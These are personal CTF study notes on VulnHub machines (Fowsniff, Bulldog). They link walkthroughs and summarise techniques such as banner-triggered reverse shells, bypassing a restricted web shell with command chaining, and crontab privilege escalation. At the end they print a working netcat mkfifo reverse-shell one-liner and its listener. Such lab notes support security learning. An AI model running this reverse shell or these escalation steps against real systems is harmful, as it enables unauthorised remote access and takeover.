Notes: A. https://www.hackingarticles.in/fowsniff-1-vulnhub-walkthrough/[imap and pop3 ports, access mailbox from cli, add python reverse shell to banner so when a user logs in , the banner runs and get root access, metasploit pop3 access Walkthru:
Walkthru : A. https://medium.com/@krankoPwnz/walkthrough-for-bulldog-on-vulnhub-com-c834573e28fd [passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python reverse shell for priv escalation ] B. https://securitybytes.io/vulnhub-com-bulldog-ctf-solution-b00b4640327a [pwd in binary file extract it using strings file] C. https://hack-ed.net/2017/11/09/bulldog-ctf-walkthrough/ [read files from webshell] D. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ [upgrade shell] Notes: There was a crontab file that runs daily. I tried to add bash revershell, added user to sudoer file, php reveershe shell but non worked. but I was able to create a file using that crontab which lead me to believe it is possible to perform escalation using it. I used rm cmd to perform revershell reveres shell rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.1.100 1234 >/tmp/f nc -nvlp 1234